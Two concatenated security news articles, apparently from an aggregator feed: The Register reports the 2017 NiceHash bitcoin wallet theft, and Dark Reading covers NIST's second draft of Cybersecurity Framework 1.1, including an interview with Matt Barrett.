The marketplace, where users buy and sell computing cycles for mining cryptocurrency, issued a statement on Wednesday afternoon confirming that it had indeed been hacked. Reader Lee Reeve had alerted us to NiceHash’s problems earlier in the day; our request for information from the firm has not been answered.

“Unfortunately, there has been a security breach involving NiceHash website. We are currently investigating the nature of the incident and, as a result, we are stopping all operations for the next 24 hours. Importantly, our payment system was compromised and the contents of the NiceHash Bitcoin wallet have been stolen. We are working to verify the precise number of BTC taken,” the marketplace said.


“Clearly, this is a matter of deep concern and we are working hard to rectify the matter in the coming days. In addition to undertaking our own investigation, the incident has been reported to the relevant authorities and law enforcement and we are co-operating with them as a matter of urgency.”

The admission comes just hours after NiceHash first said its site was down for maintenance, and later that its team was “working hard to resolve the issues”. The NiceHash website itself still shows a maintenance page.

While NiceHash did not put a figure, in BTC or in dollars, on the lost cryptocurrency, estimates put the loss at around $60m. NiceHash says it will relaunch with improved security “at the earliest opportunity.”

The site’s administrators are also recommending that users change, everywhere they used it, any password they reused on NiceHash.

The incident brings to mind the fateful 2014 implosion of the Mt. Gox Bitcoin exchange. That theft, later found to have been going on for years before the exchange collapsed, led to losses of hundreds of millions of dollars.

With around $60m believed lost, the NiceHash breach would not be in the same league as mtGox, but that will be of little comfort to the customers who have now been suddenly relieved of their cryptocoins, likely for good. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/12/06/nicehash_diced_up_by_hackers_thousands_of_bitcoin_pilfered/

NIST Releases New Cybersecurity Framework Draft

Updated version includes changes to some existing guidelines – and adds some new ones.

The National Institute of Standards and Technology (NIST) has released the second draft of a proposed update to the national Cybersecurity Framework of 2014.

The draft document contains important changes to some existing guidelines, especially around self-assessment of cybersecurity risk, and introduces some new ones pertaining to authorization, authentication, identity proofing, and vulnerability disclosure.  

NIST also released a proposed update to its Roadmap for Improving Critical Infrastructure Security that describes planned future activities and topics to focus on for upcoming versions of the framework.

The changes and refinements reflect feedback and comments from public and private sector stakeholders to an earlier draft update to the Cybersecurity Framework that NIST released in January 2017. NIST will make draft 2 of the Framework open for public comment through close of day January 19, 2018 and will likely go live with the changes shortly after.

“NIST is hoping Framework version 1.1 will lead to a greater consideration of supply chain risk management [SCRM], cybersecurity within SCRM, and application of [the] Framework for that cybersecurity,” says Matt Barrett, NIST’s lead on the framework.

The hope also is that the new self-assessment section and related topics in the Roadmap such as Governance and Enterprise Risk Management will prepare stakeholders for a discussion on how to better align cybersecurity measures to support business outcomes and decisions, he says.

NIST developed the Framework as required by the Cybersecurity Enhancement Act of 2014. It is designed to provide a formal framework for managing cyber risk in critical infrastructure organizations. The goal is to provide organizations in critical infrastructure with guidance on the processes, practices, and controls they can use to manage cyber risk in line with their business imperatives.

The Cybersecurity Framework establishes a common language for security models, practices, and controls across industries. At a high-level, the framework provides guidance on how organizations can identify, protect, detect, respond to, and recover from, cyber threats. It offers a tiered set of implementation practices that organizations can choose from to deploy and manage these capabilities. The methods, processes, and controls in the framework are based on globally accepted best practices and standards.

Mandatory for the Feds 

Until recently, adherence to the Framework was purely voluntary for everyone. But the Trump Administration’s Executive Order on Strengthening the Cybersecurity of Federal Networks and Critical Infrastructure in May has now made it mandatory for federal agencies, Barrett says. The order required agency heads to provide a risk management report to the White House Office of Management and Budget describing their plans to implement the Framework, he says. Originally designed for use by operators and owners of critical infrastructure, the Framework has become a de facto standard for developing and implementing cyber-risk management practices at organizations across all sectors.

The new version clarifies some of the language around cybersecurity measurement and provides more guidance on managing cybersecurity within the supply chain — an issue that has become critical in recent years. It also explains how the framework can be used to mitigate risk in the Internet of Things (IoT), operational technology and cyber-physical systems environments. In addition, NIST’s updated Cybersecurity Framework makes some refinements to the identity and access management control category to accommodate changing requirements around authentication, authorization, and identity vetting.

“The NIST updates are meant to be a dynamic, working document,” says Edgard Capdevielle, CEO of Nozomi Networks. “[They] cover a lengthy list of topics from confidence mechanisms, cyberattack lifecycles, beefing up the cybersecurity workforce, to reviewing supply chain risk management along with governance and enterprise risk management.”

While critical infrastructures cannot adapt to all prescriptive guidance overnight, the framework serves as a good roadmap to start implementation of best practices, collaboration, and new security technologies, he says. 

“With Draft 2 of Version 1.1, I expect critical infrastructure operators and federal agencies to focus more closely on supply chain, especially as weak links there have contributed to several well-known data breaches,” says Robert Vescio, managing director at Secure Systems Innovation Corporation (SSIC). “To reduce the impact of cyber incidents, it is crucial that each and every organization understands its role within the larger ecosystem, and actively contributes to proactively address emerging threats.”

Vescio believes that while most organizations can benefit from the framework, adoption should remain voluntary. A forced adoption would destroy the concept of each organization tailoring security strategies to their risk appetite and lead to spending on irrelevant controls, he says.

“NIST CSF should be important to everyone,” he says.  “Implemented correctly, [it] can help organizations evolve, while maintaining or working toward a pre-selected risk posture.”


Q&A: Matt Barrett, NIST’s Lead on the CyberSecurity Framework

(Excerpts from a Dark Reading email interview with Matt Barrett)

Q. What are the most significant changes in this draft?

Firstly, Section 4.0, previously entitled Measuring and Demonstrating Cybersecurity, has been reframed as Self-Assessing Cybersecurity Risk with the Framework to better emphasize how organizations might use the Framework to measure their risk. In acknowledgement of the wide variety of stakeholder perspectives on cybersecurity measurement and the need for a stakeholder dialog on the topic, the section was summarized and refined and NIST officially acknowledged Measuring Cybersecurity as an item on the Roadmap to Improving Critical Infrastructure Cybersecurity.

NIST clarified the use of the Framework to manage cybersecurity within supply chains by refining Section 3.3 Communicating Cybersecurity Requirements with Stakeholders. This included a simpler description of the parties involved in an organization’s supply chain. We also further integrated cyber supply chain risk management language into the Implementation Tiers. This will better enable organizations to determine their current status and desired state with regard to cyber supply chain risk management practices.

We added a few Subcategories to account for authentication and coordinated vulnerability disclosure.

Q. Are federal agencies/critical infrastructure operators required to adopt the framework?

Yes. On May 11, 2017, the President issued Executive Order on Strengthening the Cybersecurity of Federal Networks and Critical Infrastructure. Among other things, the order states that “each agency head shall provide a risk management report to the Secretary of Homeland Security and the Director of the Office of Management and Budget (OMB) within 90 days of the date of this order” and “describe the agency’s action plan to implement the Framework.”

NIST issued draft report NIST Interagency Report (IR) 8170 to support agency heads and senior cybersecurity leadership in Framework implementation planning. The draft summarizes eight private sector uses of the Framework, which may be applicable for federal agencies. By leveraging NISTIR 8170, agencies can better understand how to implement the Framework in conjunction with other NIST cybersecurity risk management standards and guidelines.

Q. Going forward, do you expect agencies/CI operators to be assessed against their adherence or failure to adhere to the framework?

With increasing use of Framework, this topic increasingly comes up. Whether it will or won’t, NIST doesn’t have charter to control such things, nor latitude to comment. However, I will offer this up.

Given the increasing dependence of organizations on technology, digital trust is an increasingly important topic. In other words, not only does an organization need to manage their cybersecurity risk, but they also need to communicate it in various forms to suppliers, partners, customers, auditors, and regulators. Framework provides a basis for a standardized communication – increasing an organization’s efficiency and reducing the chances of miscommunication – and it also provides the high-level methods of determining cybersecurity state, deciding desired state, and planning the improvements necessary to achieve the desired state.

Organizations may elect to use Framework to self-assess cybersecurity risk and communicate judiciously with others. They may also enlist external parties to assess cybersecurity risk. For this reason, NIST continues to encourage and support private sector in evaluating and implementing Framework confidence mechanisms.

Q. How should organizations use the framework?

There are many ways to use Framework and all the varied uses have a value. Out-of-the-box and without alteration, Framework offers a common and accessible vocabulary for cybersecurity risk management. In its simplest form, that vocabulary is Identify, Protect, Detect, Respond, and Recover. This allows people who are not cybersecurity experts to participate in the cybersecurity dialog.

The Framework is also meant to be customized for a given sector, subsector, or organization.  That customization ultimately means some form of prioritization. 

Framework has some native methods of customizing and prioritizing. For instance, Framework Profiles help an organization determine and communicate the outcomes that are most important for a given set of circumstances, whether those circumstances are derived from the technical environment, cybersecurity requirements such as law and regulation, or desired organizational objectives. Similarly, the Implementation Tiers of Framework help an organization decide how they would like to manage cybersecurity risk for a given part of the organization.

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year …

Article source: https://www.darkreading.com/cloud/nist-releases-new-cybersecurity-framework-draft/d/d-id/1330579?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple